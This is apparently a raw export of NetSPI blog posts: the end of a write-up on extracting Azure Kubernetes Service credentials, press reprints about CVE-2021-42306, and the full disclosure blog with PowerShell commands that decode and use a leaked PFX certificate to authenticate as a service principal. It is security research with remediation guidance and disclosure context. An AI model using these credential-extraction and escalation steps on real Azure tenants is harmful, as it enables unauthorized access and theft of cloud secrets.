In order to get access to the azure.json file, we will need to run a command on the cluster to “cat” out the file from the VMSS instance and return the command output.

The VMSS command execution can be done via the following options:

The Az PowerShell method is what is used in Get-AzPasswords, but you could manually use any of the above methods.

In Get-AzPasswords, this command execution is done by using a local command file (.\tempscript) that is passed into the Invoke-AzVmssVMRunCommand function. The command output is then parsed with some PowerShell and exported to the output table for the Get-AzPasswords function. 

Learn more about how to use Get-AzPasswords in my blog, Get-AzPasswords: Encrypting Automation Password Data.

Privilege Escalation Potential

There is a small issue here: Contributors on the subscription can gain access to a Service Principal credential that they are not the owner of. If the Service Principal has additional permissions, it could allow the contributor to escalate privileges.

In this example:

  • User A creates a Service Principal (AKS-SP), generates a password for it, and retains the “Owner” role on the Service Principal in Azure AD
  • User A creates the AKS cluster (Test cluster) and assigns it the Service Principal credentials
  • User B runs commands to extract credentials from the VMSS instance that runs the AKS cluster
  • User B now has cleartext credentials for a Service Principal (AKS-SP) that they do not have Owner rights on

This is illustrated in the diagram below.

Privilege Escalation Potential diagram

For all of the above, assume that both User A and B have the Contributor role on the subscription, and no additional roles assigned on the Azure AD tenant. Additionally, this attack could extend to the VM Contributor role and other roles that can run commands on VMSS instances (Microsoft.Compute/virtualMachineScaleSets/virtualMachines/runCommand/action).

Gathering Managed Identity Credentials

If the AKS cluster is configured with a Managed Identity, we will have to use the metadata service to get a token. We have previously covered this general process in the following blogs:

In this case, we will be using the VMSS command execution functionality to make a request to “https://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/”. This will return a JWT that is scoped to the management.azure.com domain.

For the AKS functionality in Get-AzPasswords, we currently have the token scoped to management.azure.com. If you would like to generate tokens for other scopes (i.e., Key Vaults), you can either modify the function in the PowerShell code or run the VMSS commands separately. Right now, this is a pending issue on the MicroBurst GitHub, so it is on the radar for future updates.

At this point we can use the token to gather information about the environment by using the Get-AzDomainInfoREST function from MicroBurst, written by Josh Magri at NetSPI. Keep in mind that the Managed Identity may not have any real roles applied, so your mileage may vary with the token usage. Given the Key Vault integrations with AKS, you may also have luck using Get-AzKeyVaultKeysREST or Get-AzKeyVaultSecretsREST from the MicroBurst tools, but you will need to request a Key Vault scoped token.

Gathering kubectl Credentials

As a final addition to the AKS section of Get-AzPasswords, we have added the functionality to generate kubeconfig files for authenticating with the kubectl tool. These config files allow for ongoing administrator access to the AKS environment, so they’re great for persistence.

Generating the config files can be complicated. The Az PowerShell module does not natively support this action, but the Az CLI and REST APIs do. Since we want to keep all the actions in Get-AzPasswords compatible with the Az PowerShell cmdlets, we ended up using a token (generated with Get-AzAccessToken) and making calls out to the REST APIs to generate the configuration. This prevents us from needing the Az CLI as an additional dependency.

Once the config files are created, you can replace your existing kubeconfig file on your testing system and you should have access to the AKS cluster. Ultimately, this will be dependent on the AKS cluster being available from your network location.

Conclusion

As a final note on these Get-AzPasswords additions, we have run all the privilege escalation scenarios past MSRC for review. They have confirmed that these issues (Cleartext Credentials, Non-Owner Credential Access, and Role/Service Boundary Crossing) are all expected behaviors of the AKS service in a subscription.

For the defenders reading this, Microsoft Security Center should have alerts for Get-AzPasswords activity, but you can specifically monitor for these indicators of compromise (IoCs) in your Azure subscription logs:

  • VMSS Command Execution
  • Issuing of Metadata tokens for Managed Identities
  • Generation of kubeconfig files

For those that want to try this on their own AKS cluster, the Get-AzPasswords function is available as part of the MicroBurst toolkit.

Need help securing your Azure cloud environment? Learn more about NetSPI’s Azure Penetration Testing services.

[post_title] => How To Extract Credentials from Azure Kubernetes Service (AKS) [post_excerpt] => In this penetration testing blog, we explain how to extract credentials from the Azure Kubernetes Service (AKS) using the Contributor role permissions on an AKS cluster. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => extract-credentials-from-azure-kubernetes-service [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:22:34 [post_modified_gmt] => 2023-03-16 14:22:34 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27255 [menu_order] => 253 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 26753 [post_author] => 10 [post_date] => 2021-11-23 13:16:00 [post_date_gmt] => 2021-11-23 19:16:00 [post_content] =>

On November 23, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Iain Thomson for The Register. Read the full article below or online here.

Microsoft has fixed a flaw in Azure that, according to the infosec firm that found and privately reported the issue, could be exploited by a rogue user within an Azure Active Directory instance "to escalate up to a Contributor role."

"If access to the Azure Contributor role is achieved, the user would be able to create, manage, and delete all types of resources in the affected Azure subscription," NetSPI said of the vulnerability, labeled CVE-2021-42306.

Essentially, an employee at a company using Azure Active Directory, for instance, could end up exploiting this bug to ruin an IT department or CISO's month. Microsoft said last week it fixed the problem within Azure:

Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers.

We have conducted an investigation and have found no evidence of malicious access to this data.

Microsoft Azure services affected by this issue have mitigated by preventing storage of clear text private key information in the keyCredentials property, and Azure AD has mitigated by preventing reading of clear text private key data that was previously added by any user or service in the UI or APIs.

"The discovery of this vulnerability," said NetSPI's Karl Fosaaen, who found the security hole, "highlights the importance of the shared responsibility model among cloud providers and customers. It’s vital for the security community to put the world’s most prominent technologies to the test."

[post_title] => The Register: Microsoft squashes Azure privilege-escalation bug [post_excerpt] => On November 23, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Iain Thomson for The Register. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => the-register-microsoft-squashes-azure-privilege-escalation-bug [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:42 [post_modified_gmt] => 2022-12-16 16:51:42 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26753 [menu_order] => 280 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 26727 [post_author] => 10 [post_date] => 2021-11-18 18:47:00 [post_date_gmt] => 2021-11-19 00:47:00 [post_content] =>

On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Jay Ferron for ChannelPro Network. Read the full article below or online here.

Microsoft recently mitigated an information disclosure issue, CVE-2021-42306, to prevent private key data from being stored by some Azure services in the keyCredentials property of an Azure Active Directory (Azure AD) Application and/or Service Principal, and prevent reading of private key data previously stored in the keyCredentials property.

The keyCredentials property is used to configure an application’s authentication credentials. It is accessible to any user or service in the organization’s Azure AD tenant with read access to application metadata.

The property is designed to accept a certificate with public key data for use in authentication, but certificates with private key data could have also been incorrectly stored in the property. Access to private key data can lead to an elevation of privilege attack by allowing a user to impersonate the impacted Application or Service Principal.

Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers. We have conducted an investigation and have found no evidence of malicious access to this data.

Microsoft Azure services affected by this issue have mitigated by preventing storage of clear text private key information in the keyCredentials property, and Azure AD has mitigated by preventing reading of clear text private key data that was previously added by any user or service in the UI or APIs.

As a result, clear text private key material in the keyCredentials property is inaccessible, mitigating the risks associated with storage of this material in the property.

As a precautionary measure, Microsoft is recommending customers using these services take action as described in “Affected products/services,” below. We are also recommending that customers who suspect private key data may have been added to credentials for additional Azure AD applications or Service Principals in their environments follow this guidance.

Affected products/services

Microsoft has identified the following platforms/services that stored their private keys in the public property. We have notified customers who have impacted Azure AD applications created by these services and notified them via Azure Service Health Notifications to provide remediation guidance specific to the services they use.

Product/ServiceMicrosoft’s MitigationCustomer impact assessment and remediation
Azure Automation uses the Application and Service Principal keyCredential APIs when Automation Run-As Accounts are createdAzure Automation deployed an update to the service to prevent private key data in clear text from being uploaded to Azure AD applications. Run-As accounts created or renewed after 10/15/2021 are not impacted and do not require further action.Automation Run As accounts created with an Azure Automation self-signed certificate between 10/15/2020 and 10/15/2021 that have not been renewed are impacted. Separately customers who bring their own certificates could be affected. This is regardless of the renewal date of the certificate.

To identify and remediate impacted Azure AD applications associated with impacted Automation Run-As accounts, please navigate to this Github Repo.

In addition, Azure Automation supports Managed Identities Support (GA announced on October 2021). Migrating to Managed Identities from Run-As will mitigate this issue. Please follow the guidance here to migrate.
Azure Migrate service creates Azure AD applications to enable Azure Migrate appliances to communicate with the service’s endpoints.Azure Migrate deployed an update to prevent private key data in clear text from being uploaded to Azure AD applications.

Azure Migrate appliances that were registered after 11/02/2021 and had Appliance configuration manager version 6.1.220.1 and above are not impacted and do not require further action.
Azure Migrate appliances registered prior to 11/02/2021 and/or appliances registered after 11/02/2021 where auto-update was disabled could be affected by this issue.

To identify and remediate any impacted Azure AD applications associated with Azure Migrate appliances, please navigate to this link.
Azure Site Recovery (ASR) creates Azure AD applications to communicate with the ASR service endpoints.Azure Site Recovery deployed an update to prevent private keydata from being uploaded to Azure AD applications. Customers using Azure Site Recovery’s preview experience “VMware to Azure Disaster Recovery” after 11/01/2021 are not impacted and do not require further action.Customers who have deployed and registered the preview version of VMware to Azure DR experience with ASR before 11/01/2021 could be affected.

To identify and remediate the impacted AAD Apps associated with Azure Site Recovery appliances, please navigate to this link.
Azure AD applications and Service Principals [1]Microsoft has blocked reading private key data as of 10/30/2021.Follow the guidance available at aad-app-credential-remediation-guide to assess if your application key credentials need to be rotated. The guidance walks through the assessment steps to identify if private key information was stored in keyCredentials and provides remediation options for credential rotation.

[1] This issue only affects Azure AD Applications and Service Principals where private key material in clear text was added to a keyCredential. Microsoft recommends taking precautionary steps to identify any additional instances of this issue in applications where you manage credentials and take remediation steps if impact is found.

What else can I do to audit and investigate applications for unexpected use?

Additionally, as a best practice, we recommend auditing and investigating applications for unexpected use:

  • Audit the permissions that have been granted to the impacted entities (e.g., subscription access, roles, OAuth permissions, etc.) to assess impact in case the credentials were exposed. Refer to the Application permission section in the security operations guide.
  • If you rotated the credential for your application/service principal, we suggest investigating for unexpected use of the impacted entity especially if it has high privilege permissions to sensitive resources. Additionally, review the security guidance on least privilege access for apps to ensure your applications are configured with least privilege access.
  • Check sign-in logs, AAD audit logs and M365 audit logs, for anomalous activity like sign-ins from unexpected IP addresses.
  • Customers who have Microsoft Sentinel deployed in their environment can leverage notebook/playbook/hunting queries to look for potentially malicious activities. Look for more guidance here.
  • For more information refer to the security operations guidance.

Part of any robust security posture is working with researchers to help find vulnerabilities, so we can fix any findings before they are misused. We want to thank Karl Fosaaen of NetSPI who reported this vulnerability and Allscripts who worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe.

[post_title] => ChannelPro Network: Azure Active Directory (AD) KeyCredential Property Information Disclosure [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Jay Ferron for ChannelPro Network. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => channelpro-network-azure-active-directory-ad-keycredential-property-information-disclosure [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:43 [post_modified_gmt] => 2022-12-16 16:51:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26727 [menu_order] => 283 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [8] => WP_Post Object ( [ID] => 26733 [post_author] => 10 [post_date] => 2021-11-18 17:26:00 [post_date_gmt] => 2021-11-18 23:26:00 [post_content] =>

On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Pierluigi Paganini for Security Affairs. Read the full article below or online here.

Microsoft has recently addressed an information disclosure vulnerability, tracked as CVE-2021-42306, affecting Azure AD.

“An information disclosure vulnerability manifests when a user or an application uploads unprotected private key data as part of an authentication certificate keyCredential  on an Azure AD Application or Service Principal (which is not recommended). This vulnerability allows a user or service in the tenant with application read access to read the private key data that was added to the application.” reads the advisory published by Microsoft. “Azure AD addressed this vulnerability by preventing disclosure of any private key values added to the application. Microsoft has identified services that could manifest this vulnerability, and steps that customers should take to be protected. Refer to the FAQ section for more information.”

The vulnerability was discovered by Karl Fosaaen from NetSPI, it received a CVSS score of 8.1. Fosaaen explained that due to a misconfiguration in Azure, Automation Account “Run as” credentials (PFX certificates) ended up being stored in clear text in Azure AD and anyone with access to information on App Registrations can access them.

An attacker could use these credentials to authenticate as the App Registration, typically as a Contributor on the subscription containing the Automation Account.

“This issue stems from the way the Automation Account “Run as” credentials are created when creating a new Automation Account in Azure. There appears to have been logic on the Azure side that stores the full PFX file in the App Registration manifest, versus the associated public key.” reads the analysis published by NetSPI.

An attacker can exploit this flaw to escalate privileges to Contributor of any subscription that has an Automation Account, then access resources in the affected subscriptions, including sensitive information stored in Azure services and credentials stored in key vaults.

The issue could be potentially exploited to disable or delete resources and take entire Azure tenants offline.

Microsoft addressed the flaw by preventing Azure services from storing clear text private keys in the keyCredentials property and by preventing users from reading any private key data that has been stored in clear text.

[post_title] => Security Affairs: Microsoft addresses a high-severity vulnerability in Azure AD [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Pierluigi Paganini for Security Affairs. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => security-affairs-microsoft-addresses-a-high-severity-vulnerability-in-azure-ad [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:43 [post_modified_gmt] => 2022-12-16 16:51:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26733 [menu_order] => 282 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [9] => WP_Post Object ( [ID] => 26728 [post_author] => 10 [post_date] => 2021-11-18 16:14:00 [post_date_gmt] => 2021-11-18 22:14:00 [post_content] =>

On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. Read the full article below or online here.

Microsoft announced on Wednesday that it fixed an Azure Active Directory private key data storage gaffe that affects Azure application subscribers, but affected organizations nonetheless should carry out specific assessment and remediation tasks.

Affected organizations were notified via the Azure Service Health Notifications message center, Microsoft indicated.

"We have notified customers who have impacted Azure AD applications created by these services and notified them via Azure Service Health Notifications to provide remediation guidance specific to the services they use."

The applications requiring investigation include Azure Automation (when used with "Run-As Accounts"), Azure Migrate, Azure Site Recovery, and Azure AD Applications and Service Principals. Microsoft didn't find evidence that the vulnerability was exploited, but advised organizations to conduct audits and investigate Azure apps for any permissions that may have been granted.

Microsoft also urged IT pros to enforce least-privilege access for apps and check the "sign-in logs, AAD audit logs and M365 audit logs for anomalous activity like sign-ins from unexpected IP addresses."

Private Key Data Exposed

The problem, in essence, was that Microsoft's Azure app installation processes were including private key data in a property used for public keys. The issue was initially flagged as CVE-2021-42306, an information disclosure vulnerability associated with Azure AD's keyCredentials property. Any user in an Azure AD tenancy can read the keyCredentials property, Microsoft's announcement explained:

The keyCredentials property is used to configure an application's authentication credentials. It is accessible to any user or service in the organization's Azure AD tenant with read access to application metadata.

The keyCredential's property is supposed to just work with public keys, but it was possible to store private key data in it, too, and that's where the Microsoft Azure app install processes blundered.

"Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers," Microsoft explained.

The Microsoft Security Response Center (MSRC) credited the discovery of the issue to "Karl Fosaaen of NetSPI who reported this vulnerability and Allscripts who worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe," the announcement indicated. 

Contributor Role Rights

The magnitude of the problem was explained in a NetSPI press release. NetSPI specializes in penetration testing and attack surface reduction services for organizations.

An exploit of the CVE-2021-42306 vulnerability could give an attacker Azure Contributor role rights, with the ability to "create, manage, and delete all types of resources in the affected Azure subscription," NetSPI explained. An attacker would have access to "all of the resources in the affected subscriptions," including "credentials stored in key vaults."

NetSPI's report on the vulnerability, written by Karl Fosaaen, NetSPI's practice director, described the response by the MSRC as "one of the fastest" he's seen. Fosaaen had initially sent his report to the MSRC on Oct. 7, 2021.

Fosaaen advised following MSRC's advice, but added a cautionary note.

"Although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account 'Run as' certificates," he wrote. "Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised." 

Microsoft offers a script from this GitHub page that will check for affected apps, as noted by Microsoft Program Manager Merill Fernando in this Twitter post

[post_title] => Redmond: Microsoft Fixes Azure Active Directory Issue Exposing Private Key Data [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => redmond-microsoft-fixes-azure-active-directory-issue-exposing-private-key-data [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26728 [menu_order] => 284 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [10] => WP_Post Object ( [ID] => 26730 [post_author] => 10 [post_date] => 2021-11-18 15:19:00 [post_date_gmt] => 2021-11-18 21:19:00 [post_content] =>

On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Octavio Mares for Information Security Newspaper. Read the full article below or online here.

This week, Microsoft reported the detection of a sensitive information leak vulnerability that affects many Azure Active Directory (AD) deployments. The flaw was tracked as CVE-2021-42306 and received a score of 8.1/10 according to the Common Vulnerability Scoring System (CVSS).

According to the report, incorrect configuration in Azure allows “Run As” credentials in the automation account to be stored in plain text, so any user with access to application registration information could access this information, including threat actors.

CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory

The flaw was identified by researchers at cybersecurity firm NetSPI, who mention that an attacker could exploit this condition to perform privilege escalation on any affected implementation. The risk is also present for credentials stored in key vaults and any information stored in Azure services, experts say.

Apparently, the flaw is related to the keyCredentials property, designed to configure authentication credentials for applications. Microsoft said: “Some Microsoft services incorrectly store private key data in keyCredentials while building applications on behalf of their customers. At the moment there is no evidence of malicious access to this data.”

The company notes that the vulnerability was fixed by preventing Azure services from storing private keys in plain text in keyCredentials, as well as preventing users from accessing any private key data incorrectly stored in this format: “Private keys in keyCredentials are inaccessible, which mitigates the risk associated with storing this information,” Microsoft concludes.

Microsoft also mentions that all Automation Run As accounts that were created with Azure Automation certificates between October 15, 2020 and October 15, 2021 are affected by this flaw. Azure Migrate services and customers who deployed VMware preview in the Azure disaster recovery experience with Azure Site Recovery (ASR) could also be vulnerable.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

[post_title] => Information Security Newspaper: Very Critical Information Disclosure Vulnerability in Azure Active Directory (AD). Patch Immediately [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => information-security-newspaper-very-critical-information-disclosure-vulnerability-in-azure-active-directory-ad-patch-immediately [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26730 [menu_order] => 285 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 26710 [post_author] => 10 [post_date] => 2021-11-18 14:34:36 [post_date_gmt] => 2021-11-18 20:34:36 [post_content] =>

On November 18, 2021, NetSPI Practice Director Karl Fosaaen was featured in an article on The Stack. Read the full article below or online here.

A critical Azure Active Directory vulnerability (CVE-2021-42361) left user credentials stored in easily accessible plain text – a bug that could have let attackers make themselves a contributor to the affected Azure AD subscription, creating, managing and deleting resources across the cloud-based IAM service; which, abused, hands a potentially terrifying amount of control to any bad actor who’s gained access.

The Azure Active Directory vulnerability resulted in private key data being stored in plaintext by four key Azure services in the keyCredentials property of an Azure AD application. (The keyCredentials property is used to configure an application’s authentication credentials. It is accessible to any user or service in the organization’s Azure AD tenant with read access to application metadata, Microsoft noted in its write-up.)

Azure Automation, Azure Migrate, Azure Site Recovery and Azure applications and Service Principals were all storing their private keys visibily in the public property Microsoft admitted.

“Automation Account ‘Run as’ credentials (PFX certificates) were being stored in cleartext, in Azure Active Directory (AAD). These credentials were available to anyone with the ability to read information about App Registrations (typically most AAD users)” said attack surface management specialist NetSPI.

The bug was spotted and reported by security firm NetSPI’s practice director Karl Fosaaen.

(His technically detailed write-up can be seen here.)

Microsoft gave it a CVSS score of 8.1 and patched it on November 17 in an out-of-band security update.

By selecting the display name, we can then see the details for the App Registration and navigate to the “Manifest” section. Within this section, we can see the “keyCredentials”.

Impacted Azure services have now deployed updates that prevent clear text private key data from being stored during application creation, and Azure AD deployed an update that prevents access to private key data that has previously been stored. NetSPI’s Fosaaen warned however that “although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account ‘Run as’ certificates. Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised.”

There’s no evidence that the bug has been publicly exploited and it would require basic authorisation, but for a motivated attacker it would have represented a significant weapon in their cloud-exploitation arsenal and raises questions about QA at Microsoft given the critical nature of the exposure.

Microsoft described the Azure Active Directory vulnerability in its security update as “an information disclosure vulnerability [that] manifests when a user or an application uploads unprotected private key data as part of an authentication certificate keyCredential  on an Azure AD Application or Service Principal….

“This vulnerability allows a user or service in the tenant with application read access to read the private key data that was added to the application” it added.

In a separate blog by Microsoft Security Response Center the company noted that “access to private key data can lead to an elevation of privilege attack by allowing a user to impersonate the impacted Application or Service Principal” — something illustrated and automated by NetSPI’s Karl Fosaaen.

It’s not Azure’s first serious security issue this year: security researchers at Israel’s Wix in August 2021 found a critical vulnerability in its flagship CosmosDB database that gave them full admin access for major Microsoft customers including several Fortune 500 multinationals. They warned at the time that the “series of flaws in a Cosmos DB feature created a loophole allowing any user to download, delete or manipulate a massive collection of commercial databases, as well as read/write access to the underlying architecture of Cosmos DB.”

[post_title] => The Stack: “Keys to the cloud” stored in plain text in Azure AD in major hyperscaler blooper [post_excerpt] => On November 18, 2021, NetSPI Practice Director Karl Fosaaen was featured in an article on The Stack. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => the-stack-keys-to-the-cloud-stored-in-plain-text-in-azure-ad-in-major-hyperscaler-blooper [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26710 [menu_order] => 286 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 26684 [post_author] => 10 [post_date] => 2021-11-17 14:13:03 [post_date_gmt] => 2021-11-17 20:13:03 [post_content] =>

Introduction

Occasionally, we find something in an environment that just looks off. It’s not always abundantly clear why it looks wrong, but clear that a deeper understanding is required. This was the case with seeing Base64 certificate data (“MII…” strings) stored with App Registration “manifests” in Azure Active Directory.

In this blog, we will share the technical details on how we found and reported CVE-2021-42306 (CredManifest) to Microsoft. In addition to Microsoft’s remediation guidance, we’ll explain the remediation steps organizations can take to protect their Azure environments.

So, what does this mean for your organization? Read our press release to explore the business impact of the issue.

TL;DR

Due to a misconfiguration in Azure, Automation Account “Run as” credentials (PFX certificates) were being stored in cleartext, in Azure Active Directory (AAD). These credentials were available to anyone with the ability to read information about App Registrations (typically most AAD users). These credentials could then be used to authenticate as the App Registration, typically as a Contributor on the subscription containing the Automation Account.

The Source of the Issue

This issue stems from the way the Automation Account “Run as” credentials are created when creating a new Automation Account in Azure. There appears to have been logic on the Azure side that stores the full PFX file in the App Registration manifest, versus the associated public key.

We can see this by creating a new Automation Account with a “Run as” account in our test tenant. As an integrated part of this process, we are assigning the Contributor role to the “Run as” account, so we will need to use an account with the Owner role to complete this step. We will use the “BlogExample” Automation Account as our example:

Add Automation Account

Take note that we are also selecting the “Create Azure Run As account” setting as “Yes” for this example. This will create a new service principal account that the Automation Account can use within running scripts. By default, this service principal will also be granted the Contributor role on the subscription that the Automation Account is created in.

We’ve previously covered Automation Accounts on the NetSPI technical blog, so hopefully this is all a refresher. For additional information on Azure Automation Accounts, read:

New Azure Run As account (service principal) created

Once the Automation and “Run as” Accounts are created, we can then see the new service principal in the App Registrations section of the Azure Active Directory blade in the Portal.

Once the Automation and “Run as” Accounts are created, we can then see the new service principal in the App Registrations section of the Azure Active Directory blade in the Portal.

By selecting the display name, we can then see the details for the App Registration and navigate to the “Manifest” section. Within this section, we can see the “keyCredentials”.

By selecting the display name, we can then see the details for the App Registration and navigate to the “Manifest” section. Within this section, we can see the “keyCredentials”.

The “value” parameter is the Base64 encoded string containing the PFX certificate file that can be used for authentication. Before we can authenticate as the App Registration, we will need to convert the Base64.

Manual Extraction of the Credentials

For the proof of concept, we will copy the certificate data out of the manifest and convert it to a PFX file.

This can be done with two lines of PowerShell:

$testcred = "MIIJ/QIBAzCCC[Truncated]="

[IO.File]::WriteAllBytes("$PWD\BlogCert.pfx",[Convert]::FromBase64String($testcred))

This will decode the certificate data to BlogCert.pfx in your current directory.

Next, we will need to import the certificate to our local store. This can also be done with PowerShell (in a local administrator session):

Import-PfxCertificate -FilePath "$PWD\BlogCert.pfx" -CertStoreLocation Cert:\LocalMachine\My
Next, we will need to import the certificate to our local store. This can also be done with PowerShell (in a local administrator session).

Finally, we can use the newly installed certificate to authenticate to the Azure subscription as the App Registration. This will require us to know the Directory (Tenant) ID, App (Client) ID, and Certificate Thumbprint for the App Registration credentials. These can be found in the “Overview” menu for the App Registration and the Manifest. 

In this example, we’ve cast these values to PowerShell variables ($thumbprint, $tenantID, $appId).

With these values available, we can then run the Add-AzAccount command to authenticate to the tenant. 

Add-AzAccount -ServicePrincipal -Tenant $tenantID -CertificateThumbprint $thumbprint -ApplicationId $appId
As we can see, the results of Get-AzRoleAssignment for our App Registration shows that it has the Contributor role in the subscription.

As we can see, the results of Get-AzRoleAssignment for our App Registration shows that it has the Contributor role in the subscription.

Automating Extraction

Since we’re penetration testers and want to automate all our attacks, we wrote up a script to help identify additional instances of this issue in tenants. The PowerShell script uses the Graph API to gather the manifests from AAD and extract the credentials out to files.

The script itself is simple, but it uses the following logic:

  1. Get a token and query the following endpoint for App Registration information -  “https://graph.microsoft.com/v1.0/myorganization/applications/
  2. For each App Registration, check the “keyCredentials” value for data and write it to a file
  3. Use the Get-PfxData PowerShell function to validate that it’s a PFX file
  4. Delete any non-PFX files and log the display name and ID for affected App Registrations to a file for tracking

Impact

For the proof of concept that I submitted to MSRC for this vulnerability, I also created a new user (noaccess) in my AAD tenant. This user did not have any additional roles applied to it, and I was able to use the account to browse to the AAD menu in the Portal and view the manifest for the App Registration. 

For the proof of concept that I submitted to MSRC for this vulnerability, I also created a new user (noaccess) in my AAD tenant. This user did not have any additional roles applied to it, and I was able to use the account to browse to the AAD menu in the Portal and view the manifest for the App Registration.

By gaining access to the App Registration credential, my new user could then authenticate to the subscription as the Contributor role for the subscription. This is an impactful privilege escalation, as it would allow any user in this environment to escalate to Contributor of any subscription with an Automation Account.

For additional reference, Microsoft’s documentation for default user permissions indicates that this is expected behavior for all member users in AAD: https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/users-default-permissions.

Remediation Steps

Below is a detailed overview of how I remediated the issue in a client environment, prior to Microsoft’s fix:

When the “Run as” certificate has been renewed, the new certificate will have its own entry in the manifest. This value will be the public certificate of the new credential.

When the “Run as” certificate has been renewed, the new certificate will have its own entry in the manifest. This value will be the public certificate of the new credential.

One important remediation step to note here is the removal of the previous certificate. If the previous credential has not yet expired it will still be viable for authentication. To fully remediate the issue, the new certificate must be generated, and the old certificate will need to be removed from the App Registration.

To fully remediate the issue, the new certificate must be generated, and the old certificate will need to be removed from the App Registration.

Now that our example has been remediated, we can see that the new manifest value decodes to the public key for the certificate.

Now that our example has been remediated, we can see that the new manifest value decodes to the public key for the certificate.

I worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue. You can read Microsoft’s disclosure materials online here.

A representative from MSRC shared the following details with NetSPI regarding the remediation steps taken by Microsoft:

  • Impacted Azure services have deployed updates that prevent clear text private key data from being stored during application creation. 
  • Additionally, Azure Active Directory deployed an update that prevents access to private key data previously stored. 
  • Customers will be notified via Azure Service Health and should perform the mitigation steps specified in the notification to remediate any confirmed impacted Application and/or Service Principal.

Although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account "Run as" certificates. Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised.  

Summary

This was one of the fastest issues that I’ve seen go through the MSRC pipeline. I really appreciate the quick turnaround and open lines of communication that we had with the MSRC team. They were really great to work with on this issue.

Below is the timeline for the vulnerability:

  • 10/07/2021 – Initial report submitted to MSRC
  • 10/08/2021 – MSRC assigns a case number to the submission
  • October of 2021 – Back and forth emails and clarification with MSRC
  • 10/29/2021 – NetSPI confirms initial MSRC remediation
  • 11/17/2021 – Public Disclosure

While this was initially researched in a test environment, this issue was quickly escalated once we identified it in client environments. We want to extend special thanks to the clients that worked with us in identifying the issue in their environment and their willingness to let us do a spot check for an unknown vulnerability.

Looking for an Azure cloud pentesting partner? Connect with NetSPI: https://www.netspi.com/contact-us/

Addendum

NetSPI initially discovered this issue with Automation Account "Run as" certificates. MSRC's blog post details that two additional services were affected: Azure Migrate and Azure Site Recovery. These two services also create App Registrations in Azure Active Directory and were affected by the same issue which caused private keys to be stored in App Manifests. It is also possible that manually created Azure AD applications and Service Principals had private keys stored in the same manner.

We recommend taking the same remediation steps for any service principals associated with these services. Microsoft has published tooling to help identify and remediate the issue in each of these scenarios. Their guides and scripts are available here: https://github.com/microsoft/aad-app-credential-tools

